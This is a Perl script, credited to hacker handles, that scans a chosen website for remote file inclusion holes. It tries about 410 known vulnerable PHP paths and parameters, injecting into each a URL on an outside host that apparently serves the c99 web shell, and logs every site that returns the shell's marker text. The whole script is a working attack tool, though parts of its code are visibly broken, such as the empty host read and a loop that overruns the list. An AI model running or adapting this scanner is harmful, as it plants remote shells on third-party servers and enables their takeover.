#!/usr/bin/perl
#Scan a host for rfi vulnz
# by Crash_Overide, edited by: metoovet. Hack too :P
use HTTP::Request;
use LWP::UserAgent;
&inizio;
sub inizio{
print q(
###########################
Rfi vulnz scanner
by The[Boss]-korell@hotmail.it
###########################
);
print "\n Insert host:(ex: http://www.site.com/)\n";
$host=;
chomp($host);
print "Ok lets scan..\n";
$rfi1="admin/admin_styles.php?mode=";
$rfi2="surveys/survey.inc.php?path=";
$rfi3="index.php?body=";
$rfi4="classes/adodbt/sql.php?classes_dir=";
$rfi5="enc/content.php?Home_Path=";
$rfi6="classified_right.php?language_dir=";
$rfi7="sources/functions.php?CONFIG[main_path]=";
$rfi8="sources/template.php?CONFIG[main_path]=";
$rfi9="embed/day.php?path=";
$rfi10="includes/dbal.php?eqdkp_root_path=";
$rfi11="sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=";
$rfi12="includes/kb_constants.php?module_root_path=";
$rfi13="mcf.php?content=";
$rfi14="components/com_facileforms/facileforms.frame.php?ff_compath=";
$rfi15="skins/advanced/advanced1.php?pluginpath[0]=";
$rfi16="zipndownload.php?PP_PATH=";
$rfi17="administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=";
$rfi18="components/com_zoom/includes/database.php?mosConfig_absolute_path=";
$rfi19="main.php?sayfa=";
$rfi20="components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=";
$rfi21="addpost_newpoll.php?addpoll=preview&thispath=";
$rfi22="header.php?abspath=";
$rfi23="components/com_performs/performs.php?mosConfig_absolute_path=";
$rfi24="administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=";
$rfi25="impex/ImpExData.php?systempath=";
$rfi26="modules/vwar/admin/admin.php?vwar_root=";
$rfi27="coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=";
$rfi28="tools/send_reminders.php?includedir=";
$rfi29="skin/zero_vote/error.php?dir=";
$rfi30="modules/TotalCalendar/about.php?inc_dir=";
$rfi31="login.php?dir=";
$rfi32="xxxs.php?BBCodeFile=";
$rfi33="index.php?pageurl=";
$rfi34="templates/headline_temp.php?nst_inc=";
$rfi35="index.php?var=";
$rfi36="index.php?pagina=";
$rfi37="index.php?go=";
$rfi38="index.php?site=";
$rfi39="phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=";
$rfi40="administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=";
$rfi41="index.php?id=";
$rfi42="index1.php?=";
$rfi43="main.php?id=";
$rfi44="content.php?page=";
$rfi45="admin.php?page=";
$rfi46="lib/gore.php?libpath=";
$rfi47="SQuery/lib/gore.php?libpath=";
$rfi48="index2.php?p=";
$rfi49="index1.php?go=";
$rfi50="news_detail.php?file=";
$rfi51="old_reports.php?file=";
$rfi52="index.php?x=";
$rfi53="index.php?nic=";
$rfi54="homepage.php?sel=";
$rfi55="index.php?sel=";
$rfi56="main.php?x=";
$rfi57="components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=";
$rfi58="index2.php?x=";
$rfi59="main.php?pagina=";
$rfi60="test.php?page=";
$rfi61="components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=";
$rfi62="akocomments.php?mosConfig_absolute_path=";
$rfi63="index.php?page=";
$rfi64="*.php?page=";
$rfi65="index.php?oldal=";
$rfi66="index.php?lang=gr&file=";
$rfi67="index.php?pag=";
$rfi68="index.php?incl=";
$rfi69="avatar.php?page=";
$rfi70="index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=";
$rfi71="index.php?p=";
$rfi72="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi73="index.php?mode=";
$rfi74="index.php?stranica=";
$rfi75="index.php?sub=";
$rfi76="index.php?t=";
$rfi77="index.php?r=";
$rfi78="index.php?menu=";
$rfi79="solpot.html?body=";
$rfi80="port.php?content=";
$rfi81="index0.php?show=";
$rfi82="index.php?topic=";
$rfi83="index.php?u=";
$rfi84="administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=";
$rfi85="administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=";
$rfi86="modules/My_eGallery/index.php?basepath=";
$rfi87="index.php?loc=";
$rfi88="myevent.php?myevent_path=";
$rfi89="administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=";
$rfi90="includes/functions.php?phpbb_root_path=";
$rfi91="m2f/m2f_phpbb204.php?m2f_root_path=";
$rfi92="show.php?path=";
$rfi93="administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=";
$rfi94="index.php?template=";
$rfi95="search.php?cutepath=";
$rfi96="show_news.php?cutepath=";
$rfi97="page.php?doc=";
$rfi98="administrator/components/com_webring/admin.webring.docs.php?component_dir=";
$rfi99="administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=";
$rfi100="help.php?css_path=";
$rfi101="components/com_galleria/galleria.html.php?mosConfig_absolute_path=";
$rfi102="big.php?pathtotemplate=";
$rfi103="includes/search.php?GlobalSettings[templatesDirectory]=";
$rfi104="interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=";
$rfi105="functions.php?include_path=";
$rfi106="includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=";
$rfi107="class.mysql.php?path_to_bt_dir=";
$rfi108="include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi109="squirrelcart/cart_content.php?cart_isp_root=";
$rfi110="index2.php?to=";
$rfi111="index.php?load=";
$rfi112="home.php?pagina=";
$rfi113="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi114="modules/Forums/admin/admin_styles.php?phpbb_root_path=";
$rfi115="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi116="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi117="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi118="include/write.php?dir=";
$rfi119="db.php?path_local=";
$rfi120="index.php?url=";
$rfi121="index.php?p=";
$rfi122="index.php?openfile=";
$rfi123="index.php?file=";
$rfi124="index.php?content=";
$rfi125="index.php?side=";
$rfi126="index.php?kobr=";
$rfi127="index.php?doc=";
$rfi128="index.php?l=";
$rfi129="index.php?a=";
$rfi130="index.php?principal=";
$rfi131="index.php?show=";
$rfi132="index.php?opcao=";
$rfi133="index.php?conteudo=";
$rfi134="index.php?meio=";
$rfi135="index.php?inc=";
$rfi136="index.php?c=";
$rfi137="index.php?rage=";
$rfi138="index.php?arquivo=";
$rfi139="components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=";
$rfi140="index.php?place=";
$rfi141="index.php?dsp=";
$rfi142="index.php?dept=";
$rfi143="index.php?lg=";
$rfi144="index.php?inhalt=";
$rfi145="index.php?ort=";
$rfi146="index.php?pilih=";
$rfi147="principal.php?conteudo=";
$rfi148="main.php?site=";
$rfi149="template.php?pagina=";
$rfi150="contenido.php?sec=";
$rfi151="index_principal.php?pagina=";
$rfi152="template.php?name=";
$rfi153="forum.php?act=";
$rfi154="home.php?action=";
$rfi155="noticias.php?arq=";
$rfi156="main.php?page=";
$rfi157="default.php?page=";
$rfi158="index.php?cont=";
$rfi159="index.php?configFile=";
$rfi160="index.php?meio.php=";
$rfi161="index.php?include=";
$rfi162="index.php?open=";
$rfi163="index.php?visualizar=";
$rfi164="index.php?cat=";
$rfi165="index.php?action=";
$rfi166="index.php?do=";
$rfi167="index2.php?content=";
$rfi168="index.phpmain.php?x=";
$rfi169="index.php?link=";
$rfi170="index.php?canal=";
$rfi171="index.php?screen=";
$rfi172="index.php?langc=";
$rfi173="services.php?page=";
$rfi174="htmltonuke.php?filnavn=";
$rfi175="ihm.php?p=";
$rfi176="folder.php?id=";
$rfi177="index.php?Load=";
$rfi178="index.php?Language=";
$rfi179="hall.php?file=";
$rfi180="hall.php?page=";
$rfi181="template.php?goto=";
$rfi182="video.php?content=";
$rfi183="pages.php?page=";
$rfi184="print.php?page=";
$rfi185="show.php?page=";
$rfi186="view.php?page=";
$rfi187="media.php?page=";
$rfi188="index1.php?choix=";
$rfi189="index1.php?menu=";
$rfi190="index2.php?showpage=";
$rfi191="index2.php?ascii_seite=";
$rfi192="index2.php?DoAction=";
$rfi193="index2.php?ID=";
$rfi194="index2.php?url_page=";
$rfi195="index1.php?dat=";
$rfi196="index1.php?site=";
$rfi197="home.php?content=";
$rfi198="main.php?link=";
$rfi199="home.php?x=";
$rfi200="index1.php?x=";
$rfi201="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi202="modules/agendax/addevent.inc.php?agendax_path=";
$rfi203="include/main.php?config[search_disp]=true&include_dir=";
$rfi204="contrib/yabbse/poc.php?poc_root_path=";
$rfi205="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi206="photoalb/lib/static/header.php?set_menu=";
$rfi207="squito/photolist.inc.php?photoroot=";
$rfi208="bz/squito/photolist.inc.php?photoroot=";
$rfi209="ppa/inc/functions.inc.php?config[ppa_root_path]=";
$rfi210="spid/lang/lang.php?lang_path=";
$rfi211="classes.php?LOCAL_PATH=";
$rfi212="al_initialize.php?alpath=";
$rfi213="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi214="index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=";
$rfi215="extensions/moblog/moblog_lib.php?basedir=";
$rfi216="app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=";
$rfi217="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$rfi218="components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=";
$rfi219="components/com_smf/smf.php?mosConfig_absolute_path=";
$rfi220="components/com_cpg/cpg.php?mosConfig_absolute_path=";
$rfi221="administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=";
$rfi222="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi223="inc/cmses/aedating4CMS.php?dir[inc]=";
$rfi224="components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=";
$rfi225="jscript.php?my_ms[root]=";
$rfi226="popup_window.php?site_isp_root=";
$rfi227="yabbse/Sources/Packages.php?sourcedir=";
$rfi228="includes/functions_portal.php?phpbb_root_path=";
$rfi229="includes/header.php?systempath=";
$rfi230="Gallery/displayCategory.php?basepath=";
$rfi231="index.inc.php?PATH_Includes=";
$rfi232="nphp/nphpd.php?nphp_config[LangFile]=";
$rfi233="include/db.php?GLOBALS[rootdp]=";
$rfi234="ashnews.php?pathtoashnews=";
$rfi235="ashheadlines.php?pathtoashnews=";
$rfi236="demo/includes/init.php?user_inc=";
$rfi237="jaf/index.php?show=";
$rfi238="inc/shows.inc.php?cutepath=";
$rfi239="poll/admin/common.inc.php?base_path=";
$rfi240="pollvote/pollvote.php?pollname=";
$rfi241="sources/post.php?fil_config=";
$rfi242="bb_lib/checkdb.inc.php?libpach=";
$rfi243="include/livre_include.php?no_connect=lol&chem_absolu=";
$rfi244="index.php?from_market=Y&pageurl=";
$rfi245="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi246="pivot/modules/module_db.php?pivot_path=";
$rfi247="derniers_commentaires.php?rep=";
$rfi248="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi249="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi250="coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi251="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi252="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$rfi253="myPHPCalendar/admin.php?cal_dir=";
$rfi254="agendax/addevent.inc.php?agendax_path=";
$rfi255="index1.php?p=";
$rfi256="include/new-visitor.inc.php?lvc_include_dir=";
$rfi257="shoutbox/expanded.php?conf=";
$rfi258="library/editor/editor.php?root=";
$rfi259="library/lib.php?root=";
$rfi260="e107/e107_handlers/secure_img_render.php?p=";
$rfi261="zentrack/index.php?configFile=";
$rfi262="becommunity/community/index.php?pageurl=";
$rfi263="GradeMap/index.php?page=";
$rfi264="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi265="calendar/calendar.php?serverPath=";
$rfi266="calendar/functions/popup.php?serverPath=";
$rfi267="calendar/events/header.inc.php?serverPath=";
$rfi268="calendar/events/datePicker.php?serverPath=";
$rfi269="calendar/setup/setupSQL.php?serverPath=";
$rfi270="calendar/setup/header.inc.php?serverPath=";
$rfi271="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$rfi272="inc/header.php/step_one.php?server_inc=";
$rfi273="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi274="inc/pipe.php?HCL_path=";
$rfi275="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi276="coppercop/theme.php?THEME_DIR=";
$rfi277="dotproject/modules/projects/addedit.php?root_dir=";
$rfi278="dotproject/modules/projects/view.php?root_dir=";
$rfi279="dotproject/modules/projects/vw_files.php?root_dir=";
$rfi280="dotproject/modules/tasks/addedit.php?root_dir=";
$rfi281="dotproject/modules/tasks/viewgantt.php?root_dir=";
$rfi282="My_eGallery/public/displayCategory.php?basepath=";
$rfi283="index.php?include=";
$rfi284="index.php?x=";
$rfi285="index.php?content=";
$rfi286="index.php?cat=";
$rfi287="index2.php?x=";
$rfi288="GradeMap/index.php?page=";
$rfi289="path_of_cpcommerce/_functions.php?prefix=";
$rfi290="contacts.php?cal_dir=";
$rfi291="convert-date.php?cal_dir=";
$rfi292="album_portal.php?phpbb_root_path=";
$rfi293="mainfile.php?MAIN_PATH=";
$rfi294="dotproject/modules/files/index_table.php?root_dir=";
$rfi295="html/affich.php?base=";
$rfi296="gallery/init.php?HTTP_POST_VARS=";
$rfi297="pm/lib.inc.php?pm_path=";
$rfi298="ideabox/include.php?gorumDir=";
$rfi299="index2.php?includes_dir=";
$rfi300="forums/toplist.php?phpbb_root_path=";
$rfi301="forum/toplist.php?phpbb_root_path=";
$rfi302="admin/config_settings.tpl.php?include_path=";
$rfi303="include/common.php?include_path=";
$rfi304="event/index.php?page=";
$rfi305="forum/index.php?includeFooter=";
$rfi306="forums/index.php?includeFooter=";
$rfi307="forum/bb_admin.php?includeFooter=";
$rfi308="forums/bb_admin.php?includeFooter=";
$rfi309="language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi310="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi311="blend_data/blend_common.php?phpbb_root_path=";
$rfi312="master.php?root_path=";
$rfi313="forum/includes/kb_constants.php?module_root_path=";
$rfi314="forums/includes/kb_constants.php?module_root_path=";
$rfi315="agenda.php3?rooxxxenda=";
$rfi316="agenda2.php3?rooxxxenda=";
$rfi317="sources/lostpw.php?CONFIG[path]=";
$rfi318="topsites/sources/lostpw.php?CONFIG[path]=";
$rfi319="toplist/sources/lostpw.php?CONFIG[path]=";
$rfi320="sources/join.php?CONFIG[path]=";
$rfi321="topsites/sources/join.php?CONFIG[path]=";
$rfi322="toplist/sources/join.php?CONFIG[path]=";
$rfi323="topsite/sources/join.php?CONFIG[path]=";
$rfi324="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$rfi325="extras/poll/poll.php?file_newsportal=";
$rfi326="index.php?site_path=";
$rfi327="mail/index.php?site_path=";
$rfi328="fclick/show.php?path=";
$rfi329="calogic/reconfig.php?GLOBALS[CLPath]=";
$rfi330="eshow.php?Config_rootdir=";
$rfi331="auction/auction_common.php?phpbb_root_path=";
$rfi332="index.php?inc_dir=";
$rfi333="calendar/index.php?inc_dir=";
$rfi334="modules/TotalCalendar/index.php?inc_dir=";
$rfi335="modules/calendar/index.php?inc_dir=";
$rfi336="calendar/embed/day.php?path=";
$rfi337="ACalendar/embed/day.php?path=";
$rfi338="calendar/add_event.php?inc_dir=";
$rfi339="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$rfi340="claroline/auth/ldap/authldap.php?includePath=";
$rfi341="docebo/modules/credits/help.php?lang=";
$rfi342="modules/credits/help.php?lang=";
$rfi343="config.php?returnpath=";
$rfi344="editsite.php?returnpath=";
$rfi345="in.php?returnpath=";
$rfi346="addsite.php?returnpath=";
$rfi347="includes/pafiledb_constants.php?module_root_path=";
$rfi348="phpBB/includes/pafiledb_constants.php?module_root_path=";
$rfi349="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$rfi350="auth/auth.php?phpbb_root_path=";
$rfi351="auth/auth_phpbb/phpbb_root_path=";
$rfi352="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$rfi353="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$rfi354="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$rfi355="phpdig/includes/config.php?relative_script_path=";
$rfi356="includes/phpdig/includes/config.php?relative_script_path=";
$rfi357="eqdkp/includes/dbal.php?eqdkp_root_path=";
$rfi358="dkp/includes/dbal.php?eqdkp_root_path=";
$rfi359="path/include/SQuery/gameSpy2.php?libpath=";
$rfi360="include/global.php?GLOBALS[includeBit]=";
$rfi361="topsites/config.php?returnpath=";
$rfi362="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$rfi363="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$rfi364="forum/addpost_newpoll.php?thispath=";
$rfi365="forums/addpost_newpoll.php?thispath=";
$rfi366="ubbthreads/ubbt.inc.php?thispath=";
$rfi367="forums/ubbt.inc.php?thispath=";
$rfi368="forum/ubbt.inc.php?thispath=";
$rfi369="forum/admin/addentry.php?phpbb_root_path=";
$rfi370="admin/addentry.php?phpbb_root_path=";
$rfi371="index.php?f=";
$rfi372="index.php?act=";
$rfi373="ipchat.php?root_path=";
$rfi374="includes/orderSuccess.inc.php?glob[rootDir]=";
$rfi375="stats.php?dir[func]=dir[base]=";
$rfi376="ladder/stats.php?dir[base]=";
$rfi377="ladders/stats.php?dir[base]=";
$rfi378="sphider/admin/configset.php?settings_dir=";
$rfi379="admin/configset.php?settings_dir=";
$rfi380="vwar/admin/admin.php?vwar_root=";
$rfi381="modules/vWar_Account/includes/get_header.php?vwar_root=";
$rfi382="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$rfi383="forum/impex/ImpExData.php?systempath=";
$rfi384="forums/impex/ImpExData.php?systempath=";
$rfi385="application.php?base_path=";
$rfi386="index.php?theme_path=";
$rfi387="become_editor.php?theme_path=";
$rfi388="add.php?theme_path=";
$rfi389="bad_link.php?theme_path=";
$rfi390="browse.php?theme_path=";
$rfi391="detail.php?theme_path=";
$rfi392="fav.php?theme_path=";
$rfi393="get_rated.php?theme_path=";
$rfi394="login.php?theme_path=";
$rfi395="mailing_list.php?theme_path=";
$rfi396="new.php?theme_path=";
$rfi397="modify.php?theme_path=";
$rfi398="pick.php?theme_path=";
$rfi399="power_search.php?theme_path=";
$rfi400="rating.php?theme_path=";
$rfi401="register.php?theme_path=";
$rfi402="review.php?theme_path=";
$rfi403="rss.php?theme_path=";
$rfi404="search.php?theme_path=";
$rfi405="send_pwd.php?theme_path=";
$rfi406="sendmail.php?theme_path=";
$rfi407="tell_friend.php?theme_path=";
$rfi408="top_rated.php?theme_path=";
$rfi409="user_detail.php?theme_path=";
$rfi410="user_search.php?theme_path=";
$int = $values[ rand(4) ];
for($int=1;$int<710;$int++){
@cmdgif="http://ctte.php0h.com/c99.txt?";
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /r00tShell/ && $response->content =~ /TEAM/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnz..\n";
}}
}
} |
